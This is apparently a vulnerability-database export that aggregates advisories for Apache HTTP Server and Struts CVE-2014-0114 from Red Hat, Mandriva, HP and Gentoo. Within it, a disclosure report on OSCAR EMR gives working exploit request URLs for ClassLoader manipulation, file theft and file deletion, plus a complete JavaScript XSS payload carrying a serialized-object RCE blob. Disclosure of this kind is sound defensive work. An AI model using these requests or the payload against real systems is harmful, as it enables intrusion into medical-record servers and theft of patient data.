trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2013-5704", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rd18c3c43602e66f9cdcf09f1de233804975b9572b0456cc582390b6f@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/re3d27b6250aa8548b8845d314bb8a350b3df326cacbbfdfe4d455234@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/ra7f6aeb28661fbf826969526585f16856abc4615877875f9d3b35ef4@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rc998b18880df98bafaade071346690c2bc1444adaa1a1ea464b93f0a@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rcc44594d4d6579b90deccd4536b5d31f099ef563df39b094be286b9e@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rb14daf9cc4e28d18cdc15d6a6ca74e565672fabf7ad89541071d008b@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r83109088737656fa6307bd99ab40f8ff0269ae58d3f7272d7048494a@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r76142b8c5119df2178be7c2dba88fde552eedeec37ea993dfce68d1d@%3ccvs.httpd.apache.org%3e", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/20.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "https://usn.ubuntu.com/2523-1/", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache2/2.4.10-1ubuntu1.1", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache2/2.2.22-1ubuntu1.8", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache2/2.4.7-1ubuntu4.4", }, { trust: 0.1, url: "https://launchpad.net/ubuntu/+source/apache2/2.2.14-5ubuntu8.15", }, { trust: 0.1, url: "http://advisories.mageia.org/mgasa-2014-0305.html", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2013-6438", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0118", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0226", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0231", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-5704", }, { trust: 0.1, url: "http://advisories.mageia.org/mgasa-2014-0527.html", }, { trust: 0.1, url: "http://www.mandriva.com/en/support/security/", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-5704", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0118", }, { trust: 0.1, url: "http://advisories.mageia.org/mgasa-2014-0135.html", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0098", }, { trust: 0.1, url: "http://www.mandriva.com/en/support/security/advisories/", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8109", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0117", }, { trust: 0.1, url: "http://advisories.mageia.org/mgasa-2015-0011.html", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6438", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0098", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0226", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0231", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3581", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0117", }, { trust: 0.1, url: "https://www.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2015-3185", }, { trust: 0.1, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2015-3183", }, { trust: 0.1, url: "https://bugzilla.redhat.com/):", }, { trust: 0.1, url: "https://access.redhat.com/security/team/key/", }, { trust: 0.1, url: "https://access.redhat.com/articles/11258", }, { trust: 0.1, url: "https://access.redhat.com/security/updates/classification/#moderate", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2015-0253", }, { trust: 0.1, url: "https://support.apple.com/kb/ht201222", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-8161", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-8500", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-0242", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-0241", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-0243", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-1349", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-5911", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-3166", }, { trust: 0.1, url: "https://www.apple.com/support/security/pgp/", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-3165", }, { trust: 0.1, url: "http://gpgtools.org", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0067", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-3167", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-0244", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3183", }, { trust: 0.1, url: "http://slackware.com", }, { trust: 0.1, url: "http://osuosl.org)", }, { trust: 0.1, url: "http://slackware.com/gpg-key", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0253", }, { trust: 0.1, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3185", }, ], sources: [ { db: "VULHUB", id: "VHN-78174", }, { db: "VULMON", id: "CVE-2015-0228", }, { db: "BID", id: "91787", }, { db: "BID", id: "73041", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "PACKETSTORM", id: "130735", }, { db: "PACKETSTORM", id: "131098", }, { db: "PACKETSTORM", id: "133281", }, { db: "PACKETSTORM", id: "133619", }, { db: "PACKETSTORM", id: "132743", }, { db: "CNNVD", id: "CNNVD-201503-136", }, { db: "NVD", id: "CVE-2015-0228", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-78174", }, { db: "VULMON", id: "CVE-2015-0228", }, { db: "BID", id: "91787", }, { db: "BID", id: "73041", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "PACKETSTORM", id: "130735", }, { db: "PACKETSTORM", id: "131098", }, { db: "PACKETSTORM", id: "133281", }, { db: "PACKETSTORM", id: "133619", }, { db: "PACKETSTORM", id: "132743", }, { db: "CNNVD", id: "CNNVD-201503-136", }, { db: "NVD", id: "CVE-2015-0228", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2015-03-08T00:00:00", db: "VULHUB", id: "VHN-78174", }, { date: "2015-03-08T00:00:00", db: "VULMON", id: "CVE-2015-0228", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2015-03-11T00:00:00", db: "BID", id: "73041", }, { date: "2015-03-10T00:00:00", db: "JVNDB", id: "JVNDB-2015-001673", }, { date: "2015-03-10T16:02:55", db: "PACKETSTORM", id: "130735", }, { date: "2015-03-30T21:25:14", db: "PACKETSTORM", id: "131098", }, { date: "2015-08-24T22:06:47", db: "PACKETSTORM", id: "133281", }, { date: "2015-09-19T15:37:27", db: "PACKETSTORM", id: "133619", }, { date: "2015-07-20T15:45:36", db: "PACKETSTORM", id: "132743", }, { date: "2015-03-09T00:00:00", db: "CNNVD", id: "CNNVD-201503-136", }, { date: "2015-03-08T02:59:00.073000", db: "NVD", id: "CVE-2015-0228", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2020-10-27T00:00:00", db: "VULHUB", id: "VHN-78174", }, { date: "2023-11-07T00:00:00", db: "VULMON", id: "CVE-2015-0228", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-20T12:03:00", db: "BID", id: "73041", }, { date: "2016-07-27T00:00:00", db: "JVNDB", id: "JVNDB-2015-001673", }, { date: "2021-06-07T00:00:00", db: "CNNVD", id: "CNNVD-201503-136", }, { date: "2024-11-21T02:22:35.930000", db: "NVD", id: "CVE-2015-0228", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "PACKETSTORM", id: "130735", }, { db: "PACKETSTORM", id: "133281", }, { db: "CNNVD", id: "CNNVD-201503-136", }, ], trust: 0.8, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache HTTP Server of mod_lua Service disruption in modules (DoS) Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2015-001673", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "input validation error", sources: [ { db: "CNNVD", id: "CNNVD-201503-136", }, ], trust: 0.6, }, }
var-201404-0288
Vulnerability from variot
Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Apache Struts versions 1.0.0 through 1.3.10 are vulnerable.
Security Fix(es):
-
Apache Struts 1: Class Loader manipulation via request parameters (CVE-2014-0114)
-
thrift: Improper file path sanitization in t_go_generator.cc:format_go_output() of the go client library can allow an attacker to inject commands (CVE-2016-5397)
-
slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution (CVE-2018-8088)
-
jolokia: JMX proxy mode vulnerable to remote code execution (CVE-2018-1000130)
-
bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data (CVE-2016-1000338)
-
bouncycastle: Information leak in AESFastEngine class (CVE-2016-1000339)
-
bouncycastle: Information exposure in DSA signature generation via timing attack (CVE-2016-1000341)
-
bouncycastle: ECDSA improper validation of ASN.1 encoding of signature (CVE-2016-1000342)
-
bouncycastle: DHIES implementation allowed the use of ECB mode (CVE-2016-1000344)
-
bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack (CVE-2016-1000345)
-
bouncycastle: Other party DH public keys are not fully validated (CVE-2016-1000346)
-
bouncycastle: ECIES implementation allowed the use of ECB mode (CVE-2016-1000352)
-
async-http-client: Invalid URL parsing with '?' (CVE-2017-14063)
-
undertow: File descriptor leak caused by JarURLConnection.getLastModified() allows attacker to cause a denial of service (CVE-2018-1114)
-
spring-framework: Directory traversal vulnerability with static resources on Windows filesystems (CVE-2018-1271)
-
tika: Infinite loop in BPGParser can allow remote attacker to cause a denial of service (CVE-2018-1338)
-
tika: Infinite loop in ChmParser can allow remote attacker to cause a denial of service (CVE-2018-1339)
-
pdfbox: Infinite loop in AFMParser.java allows for out of memory erros via crafted PDF (CVE-2018-8036)
-
jolokia: Cross site scripting in the HTTP servlet (CVE-2018-1000129)
-
bouncycastle: flaw in the low-level interface to RSA key pair generator (CVE-2018-1000180)
-
bouncycastle: Carry propagation bug in math.raw.Nat??? class (CVE-2016-1000340)
-
bouncycastle: DSA key pair generator generates a weak private key by default (CVE-2016-1000343)
-
spring-framework: Multipart content pollution (CVE-2018-1272)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Red Hat would like to thank Chris McCown for reporting CVE-2018-8088.
Installation instructions are located in the download section of the customer portal. Bugs fixed (https://bugzilla.redhat.com/):
1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters 1487563 - CVE-2017-14063 async-http-client: Invalid URL parsing with '?' 1544620 - CVE-2016-5397 thrift: Improper file path sanitization in t_go_generator.cc:format_go_output() of the go client library can allow an attacker to inject commands 1548909 - CVE-2018-8088 slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution 1559316 - CVE-2018-1000130 jolokia: JMX proxy mode vulnerable to remote code execution 1559317 - CVE-2018-1000129 jolokia: Cross site scripting in the HTTP servlet 1564408 - CVE-2018-1272 spring-framework: Multipart content pollution 1571050 - CVE-2018-1271 spring-framework: Directory traversal vulnerability with static resources on Windows filesystems 1572421 - CVE-2018-1338 tika: Infinite loop in BPGParser can allow remote attacker to cause a denial of service 1572424 - CVE-2018-1339 tika: Infinite loop in ChmParser can allow remote attacker to cause a denial of service 1573045 - CVE-2018-1114 undertow: File descriptor leak caused by JarURLConnection.getLastModified() allows attacker to cause a denial of service 1588306 - CVE-2018-1000180 bouncycastle: flaw in the low-level interface to RSA key pair generator 1588313 - CVE-2016-1000338 bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data 1588314 - CVE-2016-1000344 bouncycastle: DHIES implementation allowed the use of ECB mode 1588323 - CVE-2016-1000345 bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack 1588327 - CVE-2016-1000346 bouncycastle: Other party DH public keys are not fully validated 1588330 - CVE-2016-1000352 bouncycastle: ECIES implementation allowed the use of ECB mode 1588688 - CVE-2016-1000340 bouncycastle: Carry propagation bug in math.raw.Nat??? class 1588695 - CVE-2016-1000339 bouncycastle: Information leak in AESFastEngine class 1588708 - CVE-2016-1000341 bouncycastle: Information exposure in DSA signature generation via timing attack 1588715 - CVE-2016-1000342 bouncycastle: ECDSA improper validation of ASN.1 encoding of signature 1588721 - CVE-2016-1000343 bouncycastle: DSA key pair generator generates a weak private key by default 1597490 - CVE-2018-8036 pdfbox: Infinite loop in AFMParser.java allows for out of memory erros via crafted PDF
- Summary:
Fuse ESB Enterprise 7.1.0 R1 P4 (Patch 4 on Rollup Patch 1), a security update that addresses one security issue, is now available from the Red Hat Customer Portal. A remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions. (CVE-2014-0114)
Refer to the readme.txt file included with the patch files for installation instructions.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114 http://advisories.mageia.org/MGASA-2014-0219.html
Updated Packages:
Mandriva Enterprise Server 5: 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64: 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Business Server 1/X86_64: 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb HUtc9GTxbEwte2/fTU7bJ5M= =5Ewj -----END PGP SIGNATURE----- . Title: Multiple vulnerabilities in OSCAR EMR Product: OSCAR EMR Vendor: Oscar McMaster Tested version: 15.21beta361 Remediation status: Unknown Reported by: Brian D. Hysell
Product Description:
"OSCAR is open-source Electronic Medical Record (EMR) software that was first developed at McMaster University by Dr. David Chan. It is continuously enriched by contributions from OSCAR users and the Charter OSCAR Service Providers that support them. OSCAR has been certified by OntarioMD, and verified as IHE compliant, achievements made possible by the creation and success of OSCAR EMRas ISO 13485:2003 certified Quality Management System."
Timeline:
29 Mar 2016 - Vendor contacted 29 Mar 2016 - Vendor responded 29 Apr 2016 - Vendor contacted for permission to share redacted report with third party 02 May 2016 - Vendor responded 17 Jan 2017 - Lead developer contacted (no response) 01 Jul 2018 - Vendor and lead developer contacted for follow-up, informed of intended 15 Aug disclosure (no response) 12 Aug 2018 - Alternate email address attempted for lead developer (no response) 15 Aug 2018 - Vulnerabilities publicly disclosed
Contents:
This report uses OVE identifiers: http://www.openwall.com/ove/
OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency OVE-20160329-0003: Remote code execution via unsafe object deserialization OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface OVE-20160329-0007: SQL injection OVE-20160329-0008: Path traversal OVE-20160329-0002: Insecure direct object reference in document manager OVE-20160329-0005: Denial of service via resource exhaustion OVE-20160329-0006: Insecure password storage OVE-20160329-0009: Cross-site request forgery
Issue details:
=== OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency ===
OSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to CVE-2014-0114.
An authenticated user can issue the following request with different / omitted cookie headers: /oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster
Consequently, he or she can access (using a valid session cookie), e.g., /oscar/OscarBackup.sql.gz
An unauthenticated attacker is prevented from doing likewise by the aLoginFiltera servlet filter, but can still carry out a denial-of-service attack impeding any access to the application until Tomcat is restarted by issuing a request like the following: /oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid
=== OVE-20160329-0003: Remote code execution via unsafe object deserialization ===
TraceabilityReportProcessor deserializes user-provided data, allowing remote code execution given the presence of known-vulnerable libraries in the classpath such as ROME 1.0. This functionality is only available to administrators but can be exploited via XSS (OVE-20160329-0004) or CSRF (issue 9) using a payload generated with ysoserial.
In the tested configuration PMmodule/GenericIntake/ImportForm.jsp is inaccessible due to the following exception aorg.springframework.beans.factory.NoSuchBeanDefinitionException: No bean named 'oscarSecurityManager' is defineda, but were it to be accessible, it would be vulnerable as well.
=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface ===
logReport.jsp, in general, does not escape data it outputs to the page; in particular, on line 283, prop.getProperty("contentId") is printed unescaped. As a result, if an attacker includes Javascript in his or her username during a login attempt, it will be executed if an administrator views the Security Log Report for that timeframe. The text printed in the "Keyword" column is cut off at 80 characters, but that is more than enough to load an externally-hosted script, such as the following script exploiting the deserialization RCE OVE-20160329-0003:
var decodedBase64 = atob("H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA=="); var binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length)); for(var i = 0; i < binaryArray.length; i++) { binaryArray[i] = decodedBase64.charCodeAt(i); } var payload = new Blob([binaryArray], {type: "application/x-gzip"}); var formData = new FormData(); formData.append("file", payload); formData.append("submit", "Generate"); var xhr = new XMLHttpRequest(); xhr.open("POST", "/oscar/admin/GenerateTraceabilityReportAction.do"); xhr.send(formData);
XSS was not a focus of this test; other confirmed or likely XSS vulnerabilities are: * Reflected XSS through the errormsg parameter in loginfailed.jsp * Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp * Reflected XSS through the noteId parameter, line 1562 in CaseManagementViewAction (untested) * Reflected XSS through the pdfName parameter when an exception has been thrown, line 1174 in ManageDocumentAction (untested) * Reflected XSS through the pharmaName and pharmaFax parameters, line 149 in FrmCustomedPDFServlet (untested) * Reflected XSS through the id and followupValue parameters, line 81 in EctAddShortMeasurementAction (untested)
=== OVE-20160329-0007: SQL injection ===
On line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is concatenated into an SQL statement rather than parameterized; likewise the content parameter on lines 217, 223, and 229 of admin/logReport.jsp. In both cases these errors result in error-based SQL injection vulnerabilities; the former allows authenticated users with access to oscarMDS/PatientSearch.jsp to access information beyond their privilege levels while the latter is accessible only to administrators.
=== OVE-20160329-0008: Path traversal ===
ImportLogDownloadAction reads and outputs an arbitrary absolute file path provided by the user; DelImageAction deletes a user-specified filename without accounting for the possibility of relative path traversal (i.e., the inclusion of "../" in the filename).
Any authenticated user can exploit the former issue to steal files from the system, e.g., /oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz
An authenticated user with access to eforms can delete files writeable by the Tomcat user, e.g., /oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp
=== OVE-20160329-0002: Insecure direct object reference in document manager ===
ManageDocumentAction.display() does not check the permissions associated with the requested document ID (doc_no) before providing it to the requesting user. Given /oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a user with access to the document management interface can view arbitrary documents by incrementing or decrementing X, regardless of whether they have been marked private.
=== OVE-20160329-0005: Denial of service via resource exhaustion ===
uploadSignature.jsp, which is accessible to and operable by unauthenticated users, saves uploaded files to a temporary directory but never deletes them. An attacker can upload many junk files and eventually consume all disk space available to the /tmp directory, impeding access to the application depending on the functionality in question and the partition layout of the host system (the effects are crippling and pervasive if /tmp is on the same partition as /; they are much less so if /tmp is on a separate partition).
=== OVE-20160329-0006: Insecure password storage ===
Passwords are stored as SHA-1 hashes; unless unusually complex, passwords stored in that manner are typically easily recoverable with a tool such as oclHashcat. In OSCAR each hash is stored as a string of decimal numbers, rather than hexadecimal or raw bytes. This somewhat non-traditional representation adds a bit of programming work to the cracking process, but does not represent a major impediment to attack.
=== OVE-20160329-0009: Cross-site request forgery ===
The application lacks protection against cross-site request forgery attacks. A CSRF attack could be used against an administrator to exploit the deserialization RCE in a manner similar to the example provided with OVE-20160329-0004.
References:
CVE-2014-0114 (SSRT101662)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
SiteScope Affected version Resolution patch details Link to download
11.1x SiteScope 11.13 Windows 32-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00315
SiteScope 11.13 Windows 64-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00316
SiteScope 11.13 Linux 32-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00317
SiteScope 11.13 Linux 64-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00318
SiteScope 11.13 Solaris 32-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00319
SiteScope 11.13 Solaris 64-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00320
11.2x SiteScope 11.24.271 Intermediate Patch for Windows 32bit and 64bit http://support.openview.hp.com/selfsolve/document/LID/SIS_00321
SiteScope 11.24.271 Intermediate Patch for Windows 32bit on 64bit http://support.openview.hp.com/selfsolve/document/LID/SIS_00322
SiteScope 11.24.271 Intermediate Patch for Linux http://support.openview.hp.com/selfsolve/document/LID/SIS_00323
SiteScope 11.24.271 Intermediate Patch for Solaris http://support.openview.hp.com/selfsolve/document/LID/SIS_00324
HISTORY Version:1 (rev.1) - 12 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201607-09
https://security.gentoo.org/
